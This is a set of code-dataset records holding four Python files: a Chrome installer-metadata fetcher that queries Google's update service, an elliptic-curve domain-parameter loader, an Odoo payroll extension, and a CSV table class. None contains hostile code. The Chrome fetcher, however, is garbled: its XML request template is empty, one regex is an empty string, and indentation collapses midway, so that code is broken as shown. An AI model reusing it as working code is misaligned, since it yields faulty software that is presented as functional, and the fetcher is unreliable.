+{"seq_id":"594215620","text":"# coding: utf-8\n# flake8: noqa\ntry: # py3\n    from urllib import request\n    from urllib.request import urlopen\n    import configparser\n    import gzip\nexcept: # py2\n    import requests as request\n    from urllib import urlopen\n    import ConfigParser as configparser\n    import zlib as gzip\n    import StringIO\nimport xml.etree.ElementTree as tree\nimport random\nimport time\n# import ssl\nimport re\n\n\ndef get(url, data=None, method='GET', timeout=200):\n    ''' Fetch data\n    return str '''\n    ualist = [\n        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',\n        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'\n    ]\n    header = {'Accept-Encoding': 'gzip'}\n    header['User-Agent'] = random.choice(ualist)\n\n    req = request.Request(method=method, url=url, data=data, headers=header)\n    # req.set_proxy('127.0.0.1:8118', 'https')\n    # context = ssl._create_unverified_context()\n    try: # py2\n        s = request.Session()\n        resp = s.send(req.prepare())\n        page = resp.content\n    except: # py3\n        page = urlopen(req).read()\n\n    try:\n        return gzip.decompress(page, 16+gzip.MAX_WBITS).decode()\n    except AttributeError:\n        return gzip.decompress(page).decode()\n    except OSError:\n        return page\n    except:\n        return page\n\n\ndef post(os, branch, arch):\n    ''' Build the POST payload\n    return bytes '''\n    vers = '6.3' if os == 'win' else '46.0.2490.86'\n    key = os + '_' + branch\n\n    # Windows - {GUID}; Mac - bundle ID (com.google.appname)\n    appid = {\n        'win_stable': '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n        'win_beta'  : '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n        'win_dev'   : '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n        'win_canary': '{4EA16AC7-FD5A-47C3-875B-DBF4A2008C20}',\n        'mac_stable': 'com.google.Chrome',\n        'mac_beta'  : 'com.google.Chrome',\n        'mac_dev'   : 'com.google.Chrome',\n        'mac_canary': 'com.google.Chrome.Canary'\n    }\n    ap = {\n        'win_stable': {'x86':'-multi-chrome', 'x64':'x64-stable-multi-chrome'},\n        'win_beta'  : {'x86':'1.1-beta', 'x64':'x64-beta-multi-chrome'},\n        'win_dev'   : {'x86':'2.0-dev', 'x64':'x64-dev-multi-chrome'},\n        'win_canary': {'x86':'', 'x64':'x64-canary'},\n        'mac_stable': {'x86':'', 'x64':''},\n        'mac_beta'  : {'x86':'betachannel', 'x64':'betachannel'},\n        'mac_dev'   : 
{'x86':'devchannel', 'x64':'devchannel'},\n 'mac_canary': {'x86':'', 'x64':''}\n }\n data = '''\n\n \n \n \n \n \n \n'''.format(os, vers, appid[key], ap[key][arch])\n return data.encode()\n\n\ndef xml_decode(xmls, os=None, branch=None, arch=None):\n ''' 解析 XML\n return Dict '''\n os_type = {'win': 'exe', 'mac': 'dmg'}\n fzug_url = 'https://repo.fdzh.org/chrome/%s/' % os_type[os]\n\n root = tree.fromstring(xmls)\n manifest_node = root.find('.//manifest')\n manifest_version = manifest_node.get('version')\n\n pkg_node = root.find('.//package')\n pkg_name = pkg_node.get('name')\n pkg_size = pkg_node.get('size')\n pkg_hash = pkg_node.get('hash_sha256')\n\n url_nodes = root.findall('.//url')\n urls = []\n for node in url_nodes:\n urls.append(node.get('codebase') + pkg_name)\n if arch == 'x64' and os == 'win':\n pkg_name = pkg_name.replace('.exe', '_win64.exe')\n urls.append(fzug_url + pkg_name)\n\n return {\n 'timestamp': str(time.time()).split('.')[0],\n 'os': os,\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_name,\n 'version': manifest_version,\n 'size': pkg_size,\n 'sha256': pkg_hash,\n 'urls': urls\n }\n\n\ndef get_rpm_info(branch):\n arch = 'x86_64'\n url = 'https://dl.google.com/linux/chrome/rpm/stable/'\n fzug_url = 'https://repo.fdzh.org/chrome/rpm/'\n pkgname = {\n 'stable': 'google-chrome-stable',\n 'beta': 'google-chrome-beta',\n 'dev': 'google-chrome-unstable'\n }\n metafile = ['repomd.xml', 'primary.xml.gz',\n 'filelists.xml.gz', 'other.xml.gz']\n\n meta_xml = get(url + arch + '/repodata/' + metafile[1])\n metas = re.findall('', meta_xml, re.S)\n pattern = '.*ver=\"(.+?)\".*>(.{40})<.*file=\"(.+?)\".*package=\"(.+?)\".*href=\"(.+)\"'\n for meta in metas:\n pkg_info = re.match('.*' + pkgname[branch] + pattern, meta, re.S)\n if pkg_info:\n break\n pkg_uri = arch + '/' + pkg_info.group(5)\n\n return {\n 'timestamp': pkg_info.group(3),\n 'os': 'linux',\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_info.group(5),\n 'version': pkg_info.group(1),\n 'size': pkg_info.group(4),\n 'sha256': pkg_info.group(2),\n 'urls': [url + pkg_uri, fzug_url + pkg_uri]\n }\n\n\ndef get_deb_info(branch):\n arch = 'amd64'\n url = 'https://dl.google.com/linux/chrome/deb/'\n fzug_url = 'https://repo.fdzh.org/chrome/deb/'\n pkgname = {\n 'stable': 'google-chrome-stable',\n 'beta': 'google-chrome-beta',\n 'dev': 'google-chrome-unstable'\n }\n metafile = 'Packages.gz'\n\n meta_inf = get(url + 'dists/stable/main/binary-amd64/' + metafile)\n for i in ['stable', 'beta', 'dev']:\n off = meta_inf.find(pkgname[i])\n meta_inf = meta_inf[:off-9] + '[%s]\\n' % i + meta_inf[off-9:]\n config = configparser.ConfigParser()\n try: # py3\n config.read_string(meta_inf)\n except AttributeError: # py2\n config.readfp(StringIO.StringIO(meta_inf))\n pkg_uri = config.get(branch, 'Filename')\n pkg_name = '{}_{}_{}.deb'.format(\n config.get(branch, 'Package'),\n config.get(branch, 'Version'),\n arch\n )\n\n return {\n 'timestamp': str(time.time()).split('.')[0],\n 'os': 'linux',\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_name,\n 'version': config.get(branch, 'Version')[:-2],\n 'size': config.get(branch, 'Size'),\n 'sha256': config.get(branch, 'SHA256'),\n 'urls': [url + pkg_uri, fzug_url + pkg_uri]\n }\n\n\ndef get_pkg_info(platform, branch, arch):\n api_url = 'https://tools.google.com/service/update2'\n result = []\n for i in platform:\n for j in branch:\n if i == 'linux' and j == 'canary':\n continue\n for k in arch:\n if i in ['mac', 'linux'] and k == 'x64':\n continue\n if i == 'linux':\n # Get rpm and deb 
metadata\n data = get_rpm_info(j)\n result.append(data)\n data = get_deb_info(j)\n else:\n # Get exe and dmg metadata\n resp = get(api_url, post(i, j, k), method='POST')\n data = xml_decode(resp, i, j, k)\n result.append(data)\n return result\n","sub_path":"app/chrome.py","file_name":"chrome.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640915435","text":"import json\nfrom io import RawIOBase, BufferedIOBase\nfrom os.path import join\nfrom pathlib import Path\nfrom typing import Optional, Dict, Union, BinaryIO\n\nfrom pkg_resources import resource_listdir, resource_isdir, resource_stream\nfrom public import public\n\nfrom .coordinates import AffineCoordinateModel, CoordinateModel\nfrom .curve import EllipticCurve\nfrom .mod import Mod\nfrom .model import (CurveModel, ShortWeierstrassModel, MontgomeryModel, EdwardsModel,\n TwistedEdwardsModel)\nfrom .point import Point, InfinityPoint\n\n\n@public\nclass DomainParameters(object):\n \"\"\"Domain parameters which specify a subgroup on an elliptic curve.\"\"\"\n curve: EllipticCurve\n generator: Point\n order: int\n cofactor: int\n name: Optional[str]\n category: Optional[str]\n\n def __init__(self, curve: EllipticCurve, generator: Point, order: int,\n cofactor: int, name: Optional[str] = None, category: Optional[str] = None):\n self.curve = curve\n self.generator = generator\n self.order = order\n self.cofactor = cofactor\n self.name = name\n self.category = category\n\n def __eq__(self, other):\n if not isinstance(other, DomainParameters):\n return False\n return self.curve == other.curve and self.generator == other.generator and self.order == other.order and self.cofactor == other.cofactor\n\n def __get_name(self):\n if self.name and self.category:\n return f\"{self.category}/{self.name}\"\n elif self.name:\n return self.name\n elif self.category:\n return self.category\n return \"\"\n\n def __str__(self):\n name = self.__get_name()\n if not name:\n name = str(self.curve)\n return f\"{self.__class__.__name__}({name})\"\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.curve!r}, {self.generator!r}, {self.order}, {self.cofactor})\"\n\n\ndef _create_params(curve, coords, infty):\n if curve[\"field\"][\"type\"] == \"Binary\":\n raise ValueError(\"Binary field curves are currently not supported.\")\n if curve[\"field\"][\"type\"] == \"Extension\":\n raise ValueError(\"Extension field curves are currently not supported.\")\n\n # Get model and param names\n model: CurveModel\n field = int(curve[\"field\"][\"p\"], 16)\n order = int(curve[\"order\"], 16)\n cofactor = int(curve[\"cofactor\"], 16)\n if curve[\"form\"] == \"Weierstrass\":\n model = ShortWeierstrassModel()\n param_names = [\"a\", \"b\"]\n elif curve[\"form\"] == \"Montgomery\":\n model = MontgomeryModel()\n param_names = [\"a\", \"b\"]\n elif curve[\"form\"] == \"Edwards\":\n model = EdwardsModel()\n param_names = [\"c\", \"d\"]\n elif curve[\"form\"] == \"TwistedEdwards\":\n model = TwistedEdwardsModel()\n param_names = [\"a\", \"d\"]\n else:\n raise ValueError(\"Unknown curve model.\")\n params = {name: Mod(int(curve[\"params\"][name][\"raw\"], 16), field) for name in param_names}\n\n # Check coordinate model name and assumptions\n coord_model: CoordinateModel\n if coords == \"affine\":\n coord_model = AffineCoordinateModel(model)\n else:\n if coords not in model.coordinates:\n raise ValueError(\"Coordinate model not supported for curve.\")\n coord_model = 
model.coordinates[coords]\n for assumption in coord_model.assumptions:\n alocals: Dict[str, Union[Mod, int]] = {}\n compiled = compile(assumption, \"\", mode=\"exec\")\n exec(compiled, None, alocals)\n for param, value in alocals.items():\n if params[param] != value:\n raise ValueError(\n f\"Coordinate model {coord_model} has an unsatisifed assumption on the {param} parameter (= {value}).\")\n\n # Construct the point at infinity\n infinity: Point\n if infty:\n infinity = InfinityPoint(coord_model)\n else:\n ilocals: Dict[str, Union[Mod, int]] = {**params}\n for line in coord_model.neutral:\n compiled = compile(line, \"\", mode=\"exec\")\n exec(compiled, None, ilocals)\n infinity_coords = {}\n for coordinate in coord_model.variables:\n if coordinate not in ilocals:\n raise ValueError(f\"Coordinate model {coord_model} requires infty option.\")\n value = ilocals[coordinate]\n if isinstance(value, int):\n value = Mod(value, field)\n infinity_coords[coordinate] = value\n infinity = Point(coord_model, **infinity_coords)\n elliptic_curve = EllipticCurve(model, coord_model, field, infinity, params) # type: ignore[arg-type]\n affine = Point(AffineCoordinateModel(model),\n x=Mod(int(curve[\"generator\"][\"x\"][\"raw\"], 16), field),\n y=Mod(int(curve[\"generator\"][\"y\"][\"raw\"], 16), field))\n if not isinstance(coord_model, AffineCoordinateModel):\n generator = affine.to_model(coord_model, elliptic_curve)\n else:\n generator = affine\n return DomainParameters(elliptic_curve, generator, order, cofactor, curve[\"name\"], curve[\"category\"])\n\n\n@public\ndef load_params(file: Union[str, Path, BinaryIO], coords: str, infty: bool = True) -> DomainParameters:\n \"\"\"\n\n :param input:\n :param coords: The name of the coordinate system to use.\n :param infty: Whether to use the special :py:class:InfinityPoint (`True`) or try to use the\n point at infinity of the coordinate system.\n :return: The curve.\n \"\"\"\n curve = None\n if isinstance(file, (str, Path)):\n with open(file, \"rb\") as f:\n curve = json.load(f)\n elif isinstance(file, (RawIOBase, BufferedIOBase, BinaryIO)):\n curve = json.load(file)\n if curve[\"field\"][\"type\"] == \"Binary\":\n raise ValueError(\"Binary field curves are currently not supported.\")\n if curve[\"field\"][\"type\"] == \"Extension\":\n raise ValueError(\"Extension field curves are currently not supported.\")\n\n return _create_params(curve, coords, infty)\n\n\n@public\ndef get_params(category: str, name: str, coords: str, infty: bool = True) -> DomainParameters:\n \"\"\"\n Retrieve a curve from a set of stored parameters. 
Uses the std-curves database at\n https://github.com/J08nY/std-curves.\n\n :param category: The category of the curve.\n :param name: The name of the curve.\n :param coords: The name of the coordinate system to use.\n :param infty: Whether to use the special :py:class:InfinityPoint (`True`) or try to use the\n point at infinity of the coordinate system.\n :return: The curve.\n \"\"\"\n listing = resource_listdir(__name__, \"std\")\n categories = list(entry for entry in listing if resource_isdir(__name__, join(\"std\", entry)))\n if category not in categories:\n raise ValueError(\"Category {} not found.\".format(category))\n json_path = join(\"std\", category, \"curves.json\")\n with resource_stream(__name__, json_path) as f:\n category_json = json.load(f)\n for curve in category_json[\"curves\"]:\n if curve[\"name\"] == name:\n break\n else:\n raise ValueError(\"Curve {} not found in category {}.\".format(name, category))\n\n return _create_params(curve, coords, infty)\n","sub_path":"pyecsca/ec/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168731014","text":"from odoo.fields import Datetime\n\nfrom odoo import api, fields, models\n\n\nclass HrPayslip(models.Model):\n _inherit = 'hr.payslip'\n\n brutto = fields.Float(readonly=True, store=True)\n netto = fields.Float(readonly=True, store=True)\n pph21_amount = fields.Float(readonly=True, store=True)\n pph21_paid = fields.Float(readonly=True, store=True)\n # transfer_request_id_payslip = fields.One2many('bank.transfer.request.payroll', 'transfer_id_payslip', string='Transfer Request ID')\n transfer_request_id_payslips = fields.Many2one('bank.transfer.request.payroll', 'Transfer Request ID')\n nik_npwp_name = fields.Char(compute='get_nik_npwp_name', store=True)\n nik = fields.Char(related='employee_id.employee_id', store=True)\n npwp = fields.Char(related='employee_id.npwp_no', store=True)\n department = fields.Char(related='employee_id.department_id.name', store=True)\n\n @api.multi\n def get_nik_npwp_name(self):\n for line in self:\n if line.employee_id.employee_id:\n line.nik_npwp_name = \"{nik}{strip1}{npwp}{strip2}{name}\".format(nik=line.employee_id.employee_id, strip1=' - ',\n npwp=line.employee_id.npwp_no, strip2=' - ',\n name=line.employee_id.name)\n else:\n line.nik_npwp_name = \"\"\n\n @api.multi\n def action_payslip_cancel(self):\n for payslip in self:\n if payslip.move_id.journal_id.update_posted:\n payslip.move_id.button_cancel()\n payslip.move_id.unlink()\n else:\n payslip.move_id.reverse_moves()\n payslip.move_id = False\n\n return self.write({'state': 'cancel'})\n\n @api.multi\n def compute_sheet(self):\n result = super(HrPayslip, self).compute_sheet()\n\n for payslip in self:\n brutto = payslip.line_ids.filtered(lambda r: r.code == 'GROSSTAX').total\n netto = payslip.line_ids.filtered(lambda r: r.code == 'NET').total\n pph21_amount = payslip.line_ids.filtered(lambda r: r.code == 'PPH21_TOTAL').total\n payslip.write(\n {'brutto': brutto, 'netto': netto, 'pph21_amount': pph21_amount})\n # for line in payslip.line_ids:\n # rule = self.env['hr.salary.rule'].search([('id', '=', line.salary_rule_id.id)])\n # line.write(\n # {'is_taxed': rule.is_taxed,\n # 'type_id': rule.type_id,\n # 'tax_class_id': rule.tax_class_id}\n # )\n\n return result\n\n def _sum_salary_rule_category(self, localdict, category, amount):\n if category.parent_id:\n localdict = self._sum_salary_rule_category(localdict, 
category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and \\\n localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n @api.model\n def _get_payslip_lines(self, contract_ids, payslip_id):\n # Override all code, care.. no super, all code must be defined here\n\n # we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {'list_rules': []}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {\n 'categories': categories,\n 'rules': rules,\n 'payslip': payslips,\n 'worked_days': worked_days,\n 'inputs': inputs}\n # get the ids of the structures on the contracts and their parent id as well\n contracts = self.env['hr.contract'].browse(contract_ids)\n if len(contracts) == 1 and payslip.struct_id:\n structure_ids = list(set(payslip.struct_id._get_parent_structure().ids))\n else:\n structure_ids = contracts.get_all_structures()\n # get the rules of the structure and thier children\n rule_ids = self.env['hr.payroll.structure'].browse(structure_ids).get_all_rules()\n # run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x: x[1])]\n sorted_rules = self.env['hr.salary.rule'].browse(sorted_rule_ids)\n\n for contract in contracts:\n employee = contract.employee_id\n # variables that available in python code\n localdict = dict(baselocaldict, employee=employee, contract=contract, lines=[])\n\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n # check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n # compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n # check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n # set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n rules_dict[rule.code] = rule\n\n # sum the amount for its salary category\n localdict = self._sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n # create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 
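# the remaining keys copy the rule's amount definition plus the computed amount, qty and rate\n                        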
'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n current_line = BrowsableObject(\n employee,\n dict_object=dict(result_dict[key], rule=rule, total_per_line=tot_rule),\n env=self.env)\n localdict['lines'].append(current_line)\n result_dict[key] = self.finalize_payslip_line(\n result_dict[key], rule, total_per_line=tot_rule)\n else:\n # blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n return list(result_dict.values())\n\n @api.model\n def finalize_payslip_line(self, line_dict, rule, total_per_line):\n # write code to change/manipulate current payslip line\n line_dict.update({\n 'is_taxed': rule.is_taxed,\n 'type_id': rule.type_id,\n 'tax_class_id': rule.tax_class_id\n })\n return line_dict\n\n @api.model\n def get_amount_by_tax(self, lines, is_taxed=True, tax_class_id='R', type_id='FIXED', category_code=False):\n total = 0\n for line in lines:\n if (line.rule.is_taxed == is_taxed and\n (not tax_class_id or line.rule.tax_class_id == tax_class_id) and\n (not type_id or line.rule.type_id == type_id) and\n (not category_code or line.rule.category_id.code == category_code)):\n total += line.total_per_line\n return total\n\n @api.multi\n def get_ptkp(self, tax_status_id):\n # payslip.env['hr.payslip'].get_ptkp(employee.tax_status_id)\n ptkp = self.env['hr.kg.payroll.tax.ptkp'].search([\n ('id', '=', tax_status_id.id)\n ])\n return ptkp.value\n\n @api.multi\n def get_pkp(self, tax_config_id, pkp_value):\n # payslip.env['hr.payslip'].get_pkp(employee.company_id.tax_config_id, pkp1)\n lst = []\n tax_config = self.env['hr.kg.payroll.tax.pkp'].search([\n ('tax_config_id', '=', tax_config_id.id),\n ], order=\"max_value asc\")\n min = 0\n for rec in tax_config:\n max = rec.max_value\n if (pkp_value > min and pkp_value < max) or rec.is_unlimited is True:\n result = (pkp_value - min) * (rec.percentage / 100)\n lst.append(result)\n break\n else:\n result = (max - min) * (rec.percentage / 100)\n lst.append(result)\n min = rec.max_value\n return sum(lst)\n\n @api.multi\n def get_family(self, fam_status_id):\n # payslip.env['hr.payslip'].get_family(employee.fam_status_id)\n family = self.env['hr.kg.payroll.configuration.family'].search([\n ('id', '=', fam_status_id.id)\n ])\n return family.percentage\n\n @api.multi\n def get_service_charge(self, payroll_config_id, date):\n # payslip.env['hr.payslip'].get_service_charge(employee.company_id.payroll_config_id, payslip.date_to)\n\n years = Datetime.from_string(date)\n service_charge = self.env['hr.kg.payroll.configuration.service.charge'].search([\n '&', ('payroll_config_id', '=', payroll_config_id.id),\n ('year', '=', years.year)\n\n ])\n return service_charge.max_value\n\n\nclass BrowsableObject(object):\n def __init__(self, employee_id, dict_object, env):\n self.employee_id = employee_id\n self.dict = dict_object\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n\nclass InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM 
hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n\nclass WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n\nclass Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n is_taxed = fields.Boolean(string='Taxed')\n tax_class_id = fields.Selection(selection=[('R', 'Regular Income'), ('I', 'Irregular Income')])\n type_id = fields.Selection(selection=[('FIXED', 'Fixed'), ('VAR', 'Var'), ('BPJS', 'BPJS')])\n nik_name = fields.Char(compute='get_nik_name', store=True)\n date_to = fields.Date(related='slip_id.date_to', store=True, string='Periode')\n nik = fields.Char(related='employee_id.employee_id', store=True)\n department = fields.Char(related='employee_id.department_id.name', store=True)\n\n @api.multi\n def get_nik_name(self):\n for line in self:\n if line.slip_id.employee_id.employee_id:\n line.nik_name = \"{nik}{strip}{name}\".format(nik=line.slip_id.employee_id.employee_id, strip=' - ',\n name=line.slip_id.employee_id.name)\n else:\n line.nik_name = \"\"\n\nclass HrPayslipInput(models.Model):\n _inherit = 'hr.payslip.input'\n\n transfer_type = fields.Selection([(\"combine\", \"Combine\"), (\"separate\", \"Separate\")], string='Transfer Type')\n transfer_request_id = fields.Many2one('bank.transfer.request.payroll', string='Transfer Request ID')\n","sub_path":"local/kg_payroll/models/hr_payslip.py","file_name":"hr_payslip.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"418767029","text":"import csv # Python package for reading and writing CSV files.\nimport pandas as pd\nimport os\n\n# You can change to wherever you want to place your CSV files.\nrel_path = os.path.realpath('../Data')\n\n\nclass CSVDataTable:\n # Change to wherever you want to save the CSV files.\n data_dir = rel_path + \"/\"\n\n def 
__init__(self, table_name, table_file, key_columns):\n \"\"\"\n Constructor\n :param table_name: Logical names for the data table.\n :param table_file: Name of CSV file to read/write(Location).\n :param key_columns: List of column names the form the primary key.\n \"\"\"\n self.table_name = table_name;\n self.table_file = table_file;\n self.key_columns = key_columns;\n self.fieldnames = list();\n self.table_data = list();\n pass\n\n def __str__(self):\n \"\"\"\n Pretty print the table and state.\n :return: String\n If we can use panda do as follows\n \"\"\";\n table_data = self.table_data;\n pd.set_option('display.max_columns', 500);\n pd.set_option('display.width', 1000);\n print(pd.DataFrame(table_data, columns=self.fieldnames));\n\n pass\n\n def load(self):\n \"\"\"\n Load information from CSV file.\n :return: rows\n \"\"\"\n self.table_data = [];\n with open(self.data_dir + self.table_file) as csvfile:\n rows = csv.DictReader(csvfile);\n self.fieldnames = rows.fieldnames;\n for row in rows:\n self.table_data.append(dict(row));\n return self.table_data;\n\n def find_by_primary_key(self, values, fields=None):\n \"\"\"\n Input value is a list of string. The order of values should correspond to key_columns.\n Fields is a list defining which of the fields from the row/tuple you want.\n Output is the single dictionary in the table that is the matching result, or null/None.\n \"\"\"\n result = list();\n if len(values) != len(self.key_columns):\n raise ValueError(str(self.key_columns), \"Invalid values for primary keys\");\n else:\n for row in self.table_data:\n flag = True;\n i = 0;\n for key in self.key_columns:\n if row[key] != values[i]:\n flag = False;\n i = i + 1;\n if flag:\n if fields is None:\n result.append(row);\n else:\n new_row = dict();\n for f in fields:\n new_row[f] = row[f];\n result.append(new_row);\n\n if len(result) > 1:\n raise ValueError(str(self.key_columns), \"Invalid primary keys with multiple matching result\")\n if len(result) < 1:\n print(\"There is no matching result for values: \" + str(values));\n\n return result;\n\n def find_by_template(self, t, fields=None):\n \"\"\"\n Return a table containing the rows matching the template and field selector.\n :param t: Template that the rows much match.\n :param fields: A list of columns to include in responses.\n :return: CSVTable containing the answer.\n \"\"\"\n rows = self.table_data;\n result = list();\n for row in rows:\n flag = True;\n for k in t.keys():\n if k in self.fieldnames:\n if row[k] != t.get(k):\n flag = False;\n else:\n return KeyError(k, \"Invalid key\");\n if flag:\n if fields is None:\n result.append(row);\n else:\n new_row = dict();\n for f in fields:\n new_row[f] = row[f];\n result.append(new_row);\n return result;\n\n def save(self):\n \"\"\"\n Write updated CSV back to the original file location.\n :return: None\n \"\"\"\n with open(self.data_dir + self.table_file, 'w') as csvTable:\n rows = self.table_data;\n writer = csv.DictWriter(csvTable, self.fieldnames);\n writer.writeheader();\n writer.writerows(rows);\n pass\n\n def insert(self, r):\n \"\"\"\n Insert a new row into the table.\n :param r: New row. r is a dict of \n :return: None. 
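Raises KeyError for an unknown column, a missing primary-key value, or a duplicate primary key.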
Table state is updated.\n        \"\"\"\n        row = dict();\n        # check key validity\n        for k in r.keys():\n            if k not in self.fieldnames:\n                raise KeyError(k, \"Invalid key\");\n        # check primary key completeness\n        pk_value = list();\n        for pk in self.key_columns:\n            if pk not in r.keys():\n                raise KeyError(pk, \"Lack of primary key\");\n            else:\n                pk_value.append(r.get(pk));\n        # check duplicate primary key\n        result = list();\n        try:\n            result = self.find_by_primary_key(pk_value, self.key_columns);\n        except (ValueError, KeyError):\n            pass\n\n        if len(result) > 0:\n            raise KeyError(str(pk_value), \"Duplicate primary key\");\n\n        for f in self.fieldnames:\n            if f in r.keys():\n                row[f] = r[f];\n            else:\n                row[f] = None;\n        self.table_data.append(row);\n        return self.table_data;\n\n    def delete(self, t):\n        \"\"\"\n        Delete all tuples matching the template.\n        :param t: Template\n        :return: None. Table is updated.\n        \"\"\"\n        result = list();\n        try:\n            result = self.find_by_template(t);\n        except (ValueError, KeyError) as e:\n            print(e);\n        if len(result) <= 0:\n            print(\"Nothing to delete\");\n            return self;\n\n        for row in result:\n            if row in self.table_data:\n                self.table_data.remove(row);\n        return self;\n","sub_path":"hw1/CSVDataTable/CSVDataTable.py","file_name":"CSVDataTable.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
